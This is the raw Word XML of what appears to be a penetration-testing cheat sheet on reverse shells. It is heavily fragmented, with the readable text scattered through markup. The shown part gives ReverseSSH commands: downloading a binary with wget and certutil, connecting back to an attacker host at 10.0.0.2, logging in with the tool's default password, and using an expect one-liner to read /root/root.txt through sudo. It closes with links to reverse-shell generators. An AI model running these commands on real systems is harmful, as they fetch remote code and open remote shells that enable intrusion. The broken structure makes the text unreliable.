      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="31FB48C7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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ReverseSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1023CFCA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A convenient way for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interactive shell access</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, as well as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file transfers</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, is dropping the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>statically-linked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:proofErr w:type="spellStart"/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ReverseSSH</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E73586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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Below is an example for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x86</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>upx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">-compressed binaries. For other binaries, check </w:t>
      </w:r>
      <w:hyperlink r:id="rId56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releases page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD37E9" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Prepare locally to catch the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> port forwarding request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556C481" w14:textId="032E2B5E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CBD610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Drop it via your preferred way, e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084127E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wget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 https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O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/reverse-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&amp;&amp;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chmod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+x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/reverse-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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46A4D69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3CC9E4A8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/reverse-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-v -l -p 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855CD89" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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>(2a) Linux target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBAC5B3" w14:textId="187DCAC0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E3F686D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Drop it via your preferred way, e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4195F5F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wget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-q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O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/reverse-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&amp;&amp;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chmod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+x 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/reverse-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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3108D7F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3B513E00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/dev/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shm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/reverse-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4444 kali@10.0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C44CBC" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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(2b) Windows 10 target (for earlier versions, check </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:anchor="features" w:history="1">
        <w:r w:rsidRPr="00827D6A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>project readme</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C08DC2" w14:textId="7066AD37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0B0D9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Drop it via your preferred way, e.g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C142F19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certutil.exe -f -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urlcache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https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F8721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64CFEDE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reverse-ssh.exe -p 4444 kali@10.0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6ACDC" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ReverseSSH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> port forwarding request was successful, you should now be able to log in with the default password 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letmeinbrudipls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the context of the user running </w:t>
      </w:r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reverse-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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(.exe)</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078223A8" w14:textId="35E6CAD5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69E8C32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Interactive shell access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B751B6E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ssh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-p 8888 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA0674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</w:p>
    <w:p w14:paraId="03C67287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# Bidirectional file transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24451C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sftp -P 8888 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C397B" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No TTY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B61CB2" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">If for some reason you cannot obtain a full TTY you </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>still can interact with programs</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that expect user input. In the following example, the password is passed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsiaTheme="majorEastAsia" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to read a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277998D" w14:textId="0797A76E" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="004701D4" w:rsidP="00827D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14A9B9B" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6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mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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expect -c 'spawn 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sudo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-S cat "/root/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root.txt</w:t>
      </w:r>
      <w:proofErr w:type="gram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";expect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> "*password*";send "&lt;THE_PASSWORD_OF_THE_USER&gt;";send "\r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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n";interact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rStyle w:val="ml-3"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43926DF3" w14:textId="6200E7B2" w:rsidR="004816D2" w:rsidRDefault="004816D2" w:rsidP="00827D6A"/>
    <w:p w14:paraId="1E56ADE3" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="4E1733D7" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="2C0DA9E5" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="3B4B8008" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="514C07A0" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="207E5BD9" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="66B83FA4" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="342CA940" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="4D5487B8" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="4F439921" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="5DEA8C6A" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="004816D2" w:rsidRDefault="00827D6A" w:rsidP="004816D2"/>
    <w:p w14:paraId="624613FF" w14:textId="77777777" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816D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spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816D2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Auto-generated shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A0C02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58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https://reverse-shell.sh/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="262B718F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59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https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB043B4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60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https://github.com/ShutdownRepo/shellerator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6422388A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61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https://github.com/0x00-0x00/ShellPop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FDFF28F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62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https://github.com/cybervaca/ShellReverse</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D69050F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63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https://liftoff.github.io/pyminifier/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60F3D143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64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https://github.com/xct/xc/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04AFD5C1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65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https://weibell.github.io/reverse-shell-generator/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68A7FB7E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66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https://github.com/t0thkr1s/revshellgen</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F67FB53" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="00000000" w:rsidP="004816D2">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="004816D2">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Arial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https://github.com/mthbernardes/rsg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7922B81B" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="004816D2"/>
    <w:p w14:paraId="7EE4900A" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="004816D2"/>
    <w:p w14:paraId="6549BF7C" w14:textId="77777777" w:rsidR="004816D2" w:rsidRDefault="004816D2"/>
    <w:sectPr w:rsidR="004816D2">
      <w:footerReference w:type="even" r:id="rId68"/>
      <w:footerReference w:type="default" r:id="rId69"/>
      <w:footerReference w:type="first" r:id="rId7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69252" w14:textId="77777777" w:rsidR="00410A68" w:rsidRDefault="00410A68" w:rsidP="004816D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3B484A2F" w14:textId="77777777" w:rsidR="00410A68" w:rsidRDefault="00410A68" w:rsidP="0048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6C4A5" w14:textId="30BB68C4" w:rsidR="004816D2" w:rsidRDefault="004816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AEEF10" wp14:editId="5725AE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EEA839" w14:textId="30B88CFE" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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EEF1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AEEA839" w14:textId="30B88CFE" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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909D" w14:textId="1D56FE81" w:rsidR="004816D2" w:rsidRDefault="004816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6E692A" wp14:editId="0EB14E38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F5E3F7" w14:textId="7C3752B1" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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E69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8F5E3F7" w14:textId="7C3752B1" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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0640" w14:textId="7F5F1DDC" w:rsidR="004816D2" w:rsidRDefault="004816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0977D4" wp14:editId="028B81B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031D9" w14:textId="19B5022A" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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0977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0F031D9" w14:textId="19B5022A" w:rsidR="004816D2" w:rsidRPr="004816D2" w:rsidRDefault="004816D2" w:rsidP="004816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4816D2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1A34" w14:textId="77777777" w:rsidR="00410A68" w:rsidRDefault="00410A68" w:rsidP="004816D2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="76AE3A3E" w14:textId="77777777" w:rsidR="00410A68" w:rsidRDefault="00410A68" w:rsidP="0048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A7E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="325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35DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E27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00840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6382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22555"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E410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F5BDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="181C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261FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="848A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C7626"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D02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C124C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EFE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C27CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="413E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D2F10"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6548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1474E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7346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41655"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D82A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D3B56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C5C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04CDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0076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C4FD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EBDA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E741C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EA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80C57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="462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4F4478"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D01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E1C98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44F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86266">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="785003042">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="92362005">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1216623448">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2069379406">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="866328782">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="604963847">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="721947881">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="161940824">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="971325818">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="939609390">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="553202559">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="553202559">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="2"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="553202559">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="3"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="553202559">
    <w:abstractNumId w:val="7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553202559">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="16778206">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2113932571">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1100292554">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2074892597">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1698970710">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="23867437">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1547331850">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="18145916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C1"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="00410A68"/>
    <w:rsid w:val="004701D4"/>
    <w:rsid w:val="004816D2"/>
    <w:rsid w:val="007C66B4"/>
    <w:rsid w:val="00827D6A"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00A861C1"/>
    <w:rsid w:val="00B55EC5"/>
    <w:rsid w:val="00E2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E3DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DEFFEF98-546D-4CAF-9F56-9417A328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81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6D2"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004816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1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816D2"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="max-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0048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27D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7D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27D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D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l-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00827D6A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0082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27D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7D6A"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="grid">
    <w:name w:val="grid"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00827D6A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="leading-normal">
    <w:name w:val="leading-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0082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498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088173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5126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901845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158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932914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894693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0176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198668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4792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820611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821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738422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8267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368294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6814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228736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399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483940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5736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300288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198279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6167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513928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9957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78507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8974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704021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3487490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17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971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8144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596195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2554673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335708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932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284141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034208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876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539436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147591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3001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055335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744545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6959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1018276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5372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02537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6063247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2709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331421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802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6589901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2828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4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956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079653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4747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294621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8172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169316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9867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4910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981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4962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12893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515801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1404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593569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0566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6629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9320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5329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4433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5247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5169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637719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4746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676076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0140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87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8344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8053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97673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635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017646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3558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716780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9818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68205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5938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250180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6830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181031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6559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298263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7233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12794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1525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85536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4100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258908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3690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7264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817849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335939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7634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057244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376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118080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7393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33266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9879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1312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671991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0828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842399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9044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7247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327315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2139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826105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9842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9392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4925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643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55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6800004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8847210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33486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31621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646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6044912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074245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35881359">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="12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54712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0773294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15324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958995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0648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7400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3243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968243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52737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31381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81310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3884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439453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366037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48062995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64640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2873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76367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41711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42784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60339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5733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5299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43572383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87834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40359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40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65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518522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436723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98335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214248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4799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2733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5308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4460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8210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813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328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26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8031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6511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3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67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948130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124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009314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294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87195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3854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454819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1548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911536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3675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747772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6038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24592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2907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926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240824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5097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0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0307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262573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0896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69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2500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2093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139266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1710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533178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9833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980816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1016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095609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2353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7246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404480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3851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186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1891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5111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156276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9712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8036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572070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91610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2984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9376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456700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6949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265949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949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790658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0196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4502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9216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331575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6312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1839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039488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021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2943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6752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029579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1951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3505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76363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2444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0716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8210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566633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6672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1879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8137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713962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8149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538346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880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2123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986487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0609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2046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526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8622268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618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7471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354178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4652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8049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999679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0665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1372262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1100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2527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1664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304211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263456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8913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70039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459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242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58922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071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5651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no0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/sbd/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://highon.coffee/blog/reverse-shell-cheat-sheet/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://liftoff.github.io/pyminifier/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://explainshell.com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cm1911.github.io/posts/whois-and-finger-reverse-shell/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1" TargetMode="External"/><Relationship Id="rId11" 